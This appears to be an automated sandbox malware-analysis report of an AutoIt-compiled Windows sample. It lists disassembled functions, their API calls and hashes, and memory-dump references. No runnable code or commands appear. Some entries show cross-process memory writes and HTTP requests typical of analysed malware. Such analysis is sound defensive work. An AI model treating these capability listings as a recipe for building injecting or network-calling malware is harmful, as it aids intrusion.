                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: cf32c393f970b56578a3c532522c9ccd5c51ec8042fc091b8ffa50249ed212aa
                                                            • Instruction ID: 97f97b4fc2f2987a8ff34418672107382f3530eac6e785d423b9f59ab3c3c014
                                                            • Opcode Fuzzy Hash: cf32c393f970b56578a3c532522c9ccd5c51ec8042fc091b8ffa50249ed212aa
                                                            • Instruction Fuzzy Hash: C6F01D32241758BBE7215BA2AC0DEAB7B7CEBC6B12F000169FE04D61619AA11A0186B5
                                                            Function 00D37230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00D37243
                                                            • EnterCriticalSection.KERNEL32(?,?,00CE0EE4,?,?), ref: 00D37254
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00CE0EE4,?,?), ref: 00D37261
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00CE0EE4,?,?), ref: 00D3726E
                                                              • Part of subcall function 00D36C35: CloseHandle.KERNEL32(00000000,?,00D3727B,?,00CE0EE4,?,?), ref: 00D36C3F
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D37281
                                                            • LeaveCriticalSection.KERNEL32(?,?,00CE0EE4,?,?), ref: 00D37288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 91e0ea9b4a664d521bc88ce09c7dfa3676ab13a296cc769ada4a0d871fff57b5
                                                            • Instruction ID: 08a3d47b72de3febbcf8be7767dbf5c7049388c6996285edcca71038151e699f
                                                            • Opcode Fuzzy Hash: 91e0ea9b4a664d521bc88ce09c7dfa3676ab13a296cc769ada4a0d871fff57b5
                                                            • Instruction Fuzzy Hash: B6F03ABA541712EBDB122B64ED4C9DB7729EF45703F140531F943D95A0CF765801CA74
                                                            Function 00D28992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D2899D
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00D289A9
                                                            • CloseHandle.KERNEL32(?), ref: 00D289B2
                                                            • CloseHandle.KERNEL32(?), ref: 00D289BA
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00D289C3
                                                            • HeapFree.KERNEL32(00000000), ref: 00D289CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: 76c8fcb0477d9ae42a6b2cba9d4e4e304b88bf6febb64e6f755f89deabc7c7b4
                                                            • Instruction ID: 6162a12d3292436395fd5df9e60f99adfcb65f8d3e3a05548be4896be3dcf2c4
                                                            • Opcode Fuzzy Hash: 76c8fcb0477d9ae42a6b2cba9d4e4e304b88bf6febb64e6f755f89deabc7c7b4
                                                            • Instruction Fuzzy Hash: 20E0C936004701FBEA012FE1EC0CD06BB69FB993237104230F615C9670CB326421DB60
                                                            Function 00D485ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D48613
                                                            • CharUpperBuffW.USER32(?,?), ref: 00D48722
                                                            • VariantClear.OLEAUT32(?), ref: 00D4889A
                                                              • Part of subcall function 00D37562: VariantInit.OLEAUT32(00000000), ref: 00D375A2
                                                              • Part of subcall function 00D37562: VariantCopy.OLEAUT32(00000000,?), ref: 00D375AB
                                                              • Part of subcall function 00D37562: VariantClear.OLEAUT32(00000000), ref: 00D375B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 93035b864229226190793127756fd3361c956f8a61fcea953671909d6fcde10b
                                                            • Instruction ID: e9eb1fe54fe2622ab6b795db21d44fc864d7a902268a002fb098b1a039663cba
                                                            • Opcode Fuzzy Hash: 93035b864229226190793127756fd3361c956f8a61fcea953671909d6fcde10b
                                                            • Instruction Fuzzy Hash: 3A919D75A043019FC710EF24C48495EBBE4EF89754F14892EF99A8B361DB31E906DBA2
                                                            Function 00D32A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CEFC86: _wcscpy.LIBCMT ref: 00CEFCA9
                                                            • _memset.LIBCMT ref: 00D32B87
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D32BB6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D32C69
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D32C97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 35a1075cf5a646937f83ced8235526fd98d7e555fd78458510db5dd7eae300d9
                                                            • Instruction ID: 4348c4dbd6777db2815de147222d30d44b3bac1244d5f2c86d5852f6d76908b1
                                                            • Opcode Fuzzy Hash: 35a1075cf5a646937f83ced8235526fd98d7e555fd78458510db5dd7eae300d9
                                                            • Instruction Fuzzy Hash: A751CC71A083009BD7659F28D845A7FB7E8EF89320F181A2DF991D6291DB70CD04D7B2
                                                            Function 00D597F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(0140EE90,?), ref: 00D59863
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00D59896
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00D59903
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID: @U=u
                                                            • API String ID: 3880355969-2594219639
                                                            • Opcode ID: 9912e374dd4d9168dba3805a22e2860741aab857292c42567f0050441ff12519
                                                            • Instruction ID: c15d9d96ecb066ff64649e4a0fa1306cd507577c978db2e18b309c2562d9c925
                                                            • Opcode Fuzzy Hash: 9912e374dd4d9168dba3805a22e2860741aab857292c42567f0050441ff12519
                                                            • Instruction Fuzzy Hash: 64512C34A00209EFCF10CF64D994AAEBBB5FB55361F148169FC659B2A0D731AD85CFA0
                                                            Function 00D29A80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00D29AD2
                                                            • __itow.LIBCMT ref: 00D29B03
                                                              • Part of subcall function 00D29D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00D29DBE
                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00D29B6C
                                                            • __itow.LIBCMT ref: 00D29BC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID: @U=u
                                                            • API String ID: 3379773720-2594219639
                                                            • Opcode ID: de13fcd2bf041cb81e9a6c5edc2d897f9b9d42d6ec221a0b4ea597f664cd5f5d
                                                            • Instruction ID: e105a9795f5d52d16d91789ba8190a615d3df3a0c96eb3932a486f0a5f576608
                                                            • Opcode Fuzzy Hash: de13fcd2bf041cb81e9a6c5edc2d897f9b9d42d6ec221a0b4ea597f664cd5f5d
                                                            • Instruction Fuzzy Hash: FA41C070A00318ABDF11EF14E895BEEBBB9EF54764F04006AFA05A7291DB709A44DB61
                                                            Function 00D297F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D29296,?,?,00000034,00000800,?,00000034), ref: 00D314E6
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D2983F
                                                              • Part of subcall function 00D31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00D314B1
                                                              • Part of subcall function 00D313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00D31409
                                                              • Part of subcall function 00D313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D31419
                                                              • Part of subcall function 00D313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D3142F
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D298AC
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D298F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @$@U=u
                                                            • API String ID: 4150878124-826235744
                                                            • Opcode ID: e728cb161bada9658a9647e760882539e69eeacc2e84464dc29491ee167945b0
                                                            • Instruction ID: 477530cc9343af01e0b5a6b155ba379b6d0f446aca1baf1313750cef1a06b8dc
                                                            • Opcode Fuzzy Hash: e728cb161bada9658a9647e760882539e69eeacc2e84464dc29491ee167945b0
                                                            • Instruction Fuzzy Hash: 45415C7690122DBFCB10DFA4CD91ADEBBB8EB19300F044199FA45B7181DA716E85CBB0
                                                            Function 00D2D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D2D5D4
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D2D60A
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D2D61B
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D2D69D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 753597075-1075368562
                                                            • Opcode ID: 10d78efa27706b83cb8a5ae1be49168af58bdf31d7a4319a57d3ae7484fbd185
                                                            • Instruction ID: ff3b2888fec4c5d2ab5057e73d9a467210b531fd6b9b13ac7eb25a1b42658d49
                                                            • Opcode Fuzzy Hash: 10d78efa27706b83cb8a5ae1be49168af58bdf31d7a4319a57d3ae7484fbd185
                                                            • Instruction Fuzzy Hash: 52418EB1600318EFDB05DF64D884A9ABBAAEF64319F1580A9AC09DF205D7B1D944CBB0
                                                            Function 00D32753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D327C0
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00D327DC
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00D32822
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D95890,00000000), ref: 00D3286B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 1bf69c58331077eabb0470c736eb620ce7cdbc3705e547dd786305e607ca1e02
                                                            • Instruction ID: d5d789eb70d1727da24d1d9d6427147895a10286d70a52efd8d4403c2a82f745
                                                            • Opcode Fuzzy Hash: 1bf69c58331077eabb0470c736eb620ce7cdbc3705e547dd786305e607ca1e02
                                                            • Instruction Fuzzy Hash: AC419E70A043419FD720DF24CC84B6ABBE9EF85314F184A2EF9A697291D770E905CB72
                                                            Function 00D58851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D588DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID: @U=u
                                                            • API String ID: 634782764-2594219639
                                                            • Opcode ID: 08a533b836ec40bad562e90657f56f2518e036f6cee276916434d008b1b32af6
                                                            • Instruction ID: b81e8759b3ddfc335bb1dd8bd654a33c265a8d4302a55e38fa62ece0b245a0b4
                                                            • Opcode Fuzzy Hash: 08a533b836ec40bad562e90657f56f2518e036f6cee276916434d008b1b32af6
                                                            • Instruction Fuzzy Hash: 8B31C334600208EEEF209B58DC45BB97BA5EB05352F984112FE51F62A1CE31D948BF72
                                                            Function 00D4D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00D4D7C5
                                                              • Part of subcall function 00CD784B: _memmove.LIBCMT ref: 00CD7899
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: fbbdda80c1acd0791268fb04a76fc96601900de39bac79bb09266012261a79a2
                                                            • Instruction ID: e2f2d5d11c9eb98909ffa1aca6fd2607db209a2af0c698e404a9bda60c883b70
                                                            • Opcode Fuzzy Hash: fbbdda80c1acd0791268fb04a76fc96601900de39bac79bb09266012261a79a2
                                                            • Instruction Fuzzy Hash: 6131AF71904619ABCF00EF58C8519FEB3B6FF04720B14862AF965A77D2DB31E905DBA0
                                                            Function 00D4182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D4184C
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D41872
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D418A2
                                                            • InternetCloseHandle.WININET(00000000), ref: 00D418E9
                                                              • Part of subcall function 00D42483: GetLastError.KERNEL32(?,?,00D41817,00000000,00000000,00000001), ref: 00D42498
                                                              • Part of subcall function 00D42483: SetEvent.KERNEL32(?,?,00D41817,00000000,00000000,00000001), ref: 00D424AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: ef131438d61f565c38f0840ec5638d24773e64d1701c452b59d786ebe81b0e9e
                                                            • Instruction ID: e15daf742e513d2594b971d602fc218ae19a9472dfbce43770de0a18238011df
                                                            • Opcode Fuzzy Hash: ef131438d61f565c38f0840ec5638d24773e64d1701c452b59d786ebe81b0e9e
                                                            • Instruction Fuzzy Hash: C221BBB5500308BFEB119B60CC85EBB7BEDEB88745F10412AF845E6240EA248D44A7B1
                                                            Function 00D563E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CD1D73
                                                              • Part of subcall function 00CD1D35: GetStockObject.GDI32(00000011), ref: 00CD1D87
                                                              • Part of subcall function 00CD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CD1D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D56461
                                                            • LoadLibraryW.KERNEL32(?), ref: 00D56468
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D5647D
                                                            • DestroyWindow.USER32(?), ref: 00D56485
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 3f9563345903f1234b5f293431a98807b3df686fb8058abce25f066845c3a03b
                                                            • Instruction ID: 04ebfe0df9b7538cdd07da5e60de4fe28c4452211732a672ba3bf93f305bfcb1
                                                            • Opcode Fuzzy Hash: 3f9563345903f1234b5f293431a98807b3df686fb8058abce25f066845c3a03b
                                                            • Instruction Fuzzy Hash: 36218871204205BFEF108FA4DC90EBB77A9EB5836AFA84629FE5097190D731DC45A770
                                                            Function 00D36D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00D36DBC
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D36DEF
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00D36E01
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00D36E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 6c070225737bdcc4519de193c89d02b88e4294ba9bad3c02cfc458e6e54b9be9
                                                            • Instruction ID: 8575bd4079b2331dde6705975f02f3808ed48596b377f14f74bd9a8e0dba5d31
                                                            • Opcode Fuzzy Hash: 6c070225737bdcc4519de193c89d02b88e4294ba9bad3c02cfc458e6e54b9be9
                                                            • Instruction Fuzzy Hash: 44215175600309BBDB209F29EC05A9A7BB4EF45720F248629FDA1DB2D0DB70D9548B74
                                                            Function 00D36E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
